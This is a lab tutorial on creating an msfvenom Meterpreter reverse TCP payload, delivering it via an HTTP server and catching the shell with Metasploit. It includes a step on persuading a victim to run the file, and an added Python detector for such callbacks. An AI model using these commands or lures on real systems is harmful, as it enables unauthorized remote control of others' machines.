Master the Art of Reverse TCP Payloads with Msfvenom
Table of Contents
- Introduction
- What is a Reverse Shell?
- Setting Up the Environment
- Creating the Payload with Msfvenom
- Transferring the Payload to the Target Machine
- Setting Up the Reverse TCP Listener with Metasploit
- Exploiting the Target Machine
- Establishing a Reverse Shell
- Performing Further Exploitation
- Conclusion
Introduction
In this tutorial, we will explore the concept of reverse shells and learn how to utilize Msfvenom and Metasploit to create a reverse TCP payload and establish a reverse shell connection with the target machine.
What is a Reverse Shell?
A reverse shell, also known as a connect-back shell, is the opposite of a bind shell. With a bind shell, the target machine opens a listening port and the attacker connects to it. In a reverse shell scenario, the roles are swapped: the attacker sets up a listener on the attacking machine, and the target machine acts as the client and connects back to that listener. This gives the attacker remote control over the target machine and typically works through firewalls and NAT that would block inbound connections to the target.
Setting Up the Environment
Before we begin, we need to set up our environment. We will be using a virtual installation of Kali Linux and Metasploitable3. Ensure that your VirtualBox network adapters are set to host-only network mode.
To find the IP address of your Kali machine, open a terminal and type ifconfig. Look for the IP address assigned to your eth0 (Ethernet) adapter.
For the target machine, open the command prompt, type ipconfig, and look for the IP address under the local area connection.
To test the connectivity between the Kali machine and the target, open a terminal on the Kali machine and type ping <target IP>.
Creating the Payload with Msfvenom
To create the reverse TCP payload, we will be using Msfvenom. Open a terminal on your Kali machine and type msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali IP> LPORT=5555 -f exe > /root/desktop/shellcodes/reverse_tcp.exe. Replace <Kali IP> with the IP address of your Kali machine. This command will create the payload as a Windows executable and save it in the specified location.
Transferring the Payload to the Target Machine
To transfer the payload to the target machine, we will use the Python 3 built-in HTTP server. Open a terminal in the working folder containing the payload and type python3 -m http.server. This will start a web server on port 8000 that serves the files in that folder.
Next, open a new terminal and type msfconsole to open Metasploit. Once in the Metasploit console, type use exploit/multi/handler to select the generic handler module that will receive the incoming connection from the payload.
Setting Up the Reverse TCP Listener with Metasploit
After selecting the handler, we need to set the payload by typing set payload windows/meterpreter/reverse_tcp. This must match the payload used when generating the executable.
Set the LHOST to the IP address of your Kali machine by typing set lhost <Kali IP>. Set the LPORT to 5555 by typing set lport 5555. These values must match the LHOST and LPORT used when generating the payload.
To start the listener, type exploit. Metasploit will now wait for the payload to connect back on port 5555.
Exploiting the Target Machine
Now that the listener is set up, we need to convince the victim to download and run the payload. Share the IP address of your web server with the victim and instruct them to visit it. In their web browser, they should enter http://<Kali IP>:8000 and click on the payload file.
Once the victim runs the payload, go back to your Kali machine. You should see a Meterpreter session open.
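Seen from the defender's side, the callback just described has a recognizable shape: an executable that was just fetched into a user-writable folder opens an outbound TCP connection to a non-standard port seconds after it starts. The following added detection example is not part of the original tutorial; it correlates constructed Sysmon-style process-create and network-connect events (the JSON field names and sample values are assumptions for illustration) and flags that pattern, still alerting when the callback port is an allowlisted one such as 443, because LPORT is the attacker's choice.

```python
import json
from datetime import datetime, timedelta

# Constructed Sysmon-style JSON lines (field names are assumptions for this example):
# id 1 = process create, id 3 = network connection. Sample data, not real captures.
SAMPLE_EVENTS = [
    r'{"ts": "2024-01-01T10:00:00", "id": 1, "pid": 4120, "image": "C:\\Users\\victim\\Downloads\\reverse_tcp.exe"}',
    r'{"ts": "2024-01-01T10:00:01", "id": 3, "pid": 4120, "dst_ip": "192.168.56.101", "dst_port": 5555, "initiated": true}',
    r'{"ts": "2024-01-01T10:00:05", "id": 1, "pid": 4200, "image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe"}',
    r'{"ts": "2024-01-01T10:00:06", "id": 3, "pid": 4200, "dst_ip": "93.184.216.34", "dst_port": 443, "initiated": true}',
    r'{"ts": "2024-01-01T10:00:07", "id": 3, "pid": 4120, "dst_ip": "192.168.56.101", "dst_port": 443, "initiated": true}',
]

# Path fragments that mark directories an ordinary user can write to.
USER_WRITABLE = ("\\downloads\\", "\\temp\\", "\\appdata\\", "\\public\\")


def from_user_writable_dir(image):
    """True if the executable lives where a downloaded file would land."""
    return any(marker in image.lower() for marker in USER_WRITABLE)


def detect_callbacks(lines, window=timedelta(seconds=30), allowed_ports=frozenset({80, 443})):
    """Correlate process-create and outbound-connect events by pid; return alerts."""
    started = {}  # pid -> (start time, image path)
    alerts = []
    for line in lines:
        ev = json.loads(line)
        ts = datetime.fromisoformat(ev["ts"])
        if ev["id"] == 1:
            started[ev["pid"]] = (ts, ev["image"])
            continue
        if ev["id"] != 3 or not ev.get("initiated") or ev["pid"] not in started:
            continue  # only outbound connections from a process we saw start
        t0, image = started[ev["pid"]]
        if not from_user_writable_dir(image) or ts - t0 > window:
            continue
        reasons = ["executable in user-writable directory",
                   f"outbound connection {int((ts - t0).total_seconds())}s after start"]
        if ev["dst_port"] not in allowed_ports:
            reasons.append(f"non-standard destination port {ev['dst_port']}")
        alerts.append({"pid": ev["pid"], "image": image,
                       "dst": f"{ev['dst_ip']}:{ev['dst_port']}", "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_callbacks(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

Against the sample events, the browser's connection to 443 is ignored because firefox.exe runs from Program Files, while both connections from the downloaded executable are reported, the one to port 5555 with an extra reason.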
Establishing a Reverse Shell
To gain remote access to the target machine, we can use the shell command in Meterpreter. Type shell and hit enter to obtain a command prompt on the target machine.
Performing Further Exploitation
Now that we have established a reverse shell, we can continue our attack and exploit the target machine further. The command prompt runs with the privileges of the user who launched the payload, so from it we can execute commands and scripts on the target machine within the limits of that account.
Conclusion
In this tutorial, we have learned how to create a reverse TCP payload using Msfvenom, transfer it to the target machine, set up a reverse TCP listener with Metasploit, and establish a reverse shell connection. This allows us to remotely control the target machine and perform further exploitation. It is important to use this knowledge responsibly and ethically, as unauthorized access to computer systems is illegal.